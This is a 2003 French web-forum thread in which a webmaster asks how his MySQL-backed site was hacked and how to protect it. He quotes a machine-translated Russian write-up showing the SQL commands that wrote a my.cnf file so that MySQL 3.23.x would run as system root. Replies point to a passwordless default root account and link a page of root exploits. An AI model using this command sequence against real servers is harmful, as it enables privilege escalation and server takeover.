PHP

Hacking et faille de sécurité MySQL, aidez-moi à me protéger.

Recherche :

Mot : Pseudo : Filtrer
Bas de page
Auteur	Sujet : Hacking et faille de sécurité MySQL, aidez-moi à me protéger.

Master_Jul

J'ai réalisé le site www.lana-france.com et ses inscriptions en php/mysql puis il a migré vers un autre hébergeur et ce matin, on l'a retrouvé hacké par un groupe russe (les gips) :

www.lana-france.com/index1.php

Voilà l'aproximative traduction de systran (du russe à l'anglais) :

Citation :

Zapuskayem MySQL under root

This is what made Gufino on MySQL 3.23.55
It entered as root and made following:

Mysql>.cREATE DATABASE Roottext;
mysql>.USE roottext;
Mysql>.cREATE TABLE Hack (conf VARCHAR(80));
Mysql>.INSERT IN Hack VALUES (' [ mysqld ] ';
Mysql>.INSERT IN Hack VALUES ("user=.root ';
mysql>.SELEccT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf ' FROM hack
mysql>.QUIT

By this was created file my.cnf in the directory of the data mysql of the following content:

[ mysqld ]
user=.root

Now, if we perezapustit' server mysql the selection of user in my.cnf it wakes it had an advantage over the analogous into /.etch/my.chnf and mysql wakes it worked with rights root, with all consequences for the safety...
This is very dangerous, since in mysql to version 3.23.53 inclusively very simply were obtained rights root with the aid of known eksploita...

Evidemment, je souhaiterai que ça ne puisse plus se reproduire à nouveau et j'aimerai savoir, ou plutôt comprendre comment ça s'est produit, juste le "il s'est loggé en root" déjà, je l'explique pas vraiment.

Merci pour votre aide :hello:

Publicité

Mara's dad

Yes I can !

Dans MySql, y'a un user root par défaut qui n'a pas de mot de passe !

La PREMIERE chose à faire c'est d'en mettre 1 !

Comme en plus il semble que ton serveur MySql tourne en tant que root . . .

Bref, à partir de là ta machine devient plus ou moins la sienne !

C'est qui ton nouvel hébergeur ?

---------------
Laissez l'Etat dans les toilettes où vous l'avez trouvé.

Master_Jul

Mara's dad a écrit :

j'étais chez www.voxtreme.com, je le suis toujours pour www.masterjul.net et www.defrag-france.net mais eux ont préféré migrer vers une solution www.serverplex.com où ils auraient été placés sur un nouveau serveur (ce qui expliquerait l'erreur ?), en tout cas, ce n'est pas moi qui ai réalisé le transfert du site

Hermes le Messager

Breton Quiétiste

Master_Jul a écrit :

Ben c'est à eux de règler le problème dans ce cas. Enfin CE problème en particulier. (du moins je crois).

Mara's dad

Yes I can !

En fait, il semble que ton hackeur ait utilisé une faille de MySQL 3.23.55

---------------
Laissez l'Etat dans les toilettes où vous l'avez trouvé.

Master_Jul

Mara's dad a écrit :

En fait, il semble que ton hackeur ait utilisé une faille de MySQL 3.23.55

non c'est vrai :heink:

Taiche

(╯°□°）╯︵ ┻━┻

Master_Jul a écrit :

non c'est vrai :heink:

Au lieu de te foutre de la gueule des gens, cherche un peu sur le Net. J'ai trouvé ça en 10 min avec Google : http://void.at/releases.html
J'ai cherché sur Google avec les termes "mysql 3.23.53 root exploit" et j'ai cliqué sur le premier lien. Dans cette page. j'ai trouvé le lien que je te donne.

---------------
Everyone thinks of changing the world, but no one thinks of changing himself | It is the peculiar quality of a fool to perceive the faults of others and to forget his own | Early clumsiness is not a verdict, it’s an essential ingredient.

Mara's dad

Yes I can !

Master_Jul a écrit :

non c'est vrai :heink:

Ben, vouis !

Rapport au fait que je pensais en premier à une simple abscence de mot de passe.

J'avais pas tout lu, ce qui à mon sens est excusable vu la traduction

Message édité par Mara's dad le 11-03-2003 à 17:56:53

---------------
Laissez l'Etat dans les toilettes où vous l'avez trouvé.

Master_Jul

Taiche a écrit :

c'est juste que c'est marqué en gros que c'est une faille qui vient de là

merci pour le lien

weed

Taiche a écrit :

J'ai cherché sur Google avec les termes "mysql 3.23.53 root exploit" et j'ai cliqué sur le premier lien. Dans cette page. j'ai trouvé le lien que je te donne.

alors la pas mal du tout
tu as posé la bonne question chose dt je n'avais pas pensé en anglais
"exploit root"
ola ola bien bien

Publicité

ethernal

Chercheur de vérité...

oups
dis moi, ton mysql c'est un MySQL 3.23.55 ou un MySQL 3.23.53 ?
tu sais accéder au serveur en ligne de commande ? (si le port 3306 est fermé, l'exploit fct ?)

---------------
...oups kernel error...

FORUM HardWare.fr

Programmation

PHP

Hacking et faille de sécurité MySQL, aidez-moi à me protéger.

Sujets relatifs
Prb MySQL	[MYSQL]Fonctionnnement du type DECIMAL dans une base MySQL
[HELP] Sauvegarde d'une base de données mysql	Mysql et Visual Basic 6.0 - Connecter les 2 ?
Limite de tables dans une base MySQL ?	[Mysql] error 127 ???
Mysql	mysql.sock manquant sous mysql J'AI TROUVE voir le post merci
[mysql] pour valeur boolean mysql, utiliser quoi?	[mysql] Laisser une valeur null par défaut ou non?
Plus de sujets relatifs à : Hacking et faille de sécurité MySQL, aidez-moi à me protéger.

Page générée en 0.056 secondes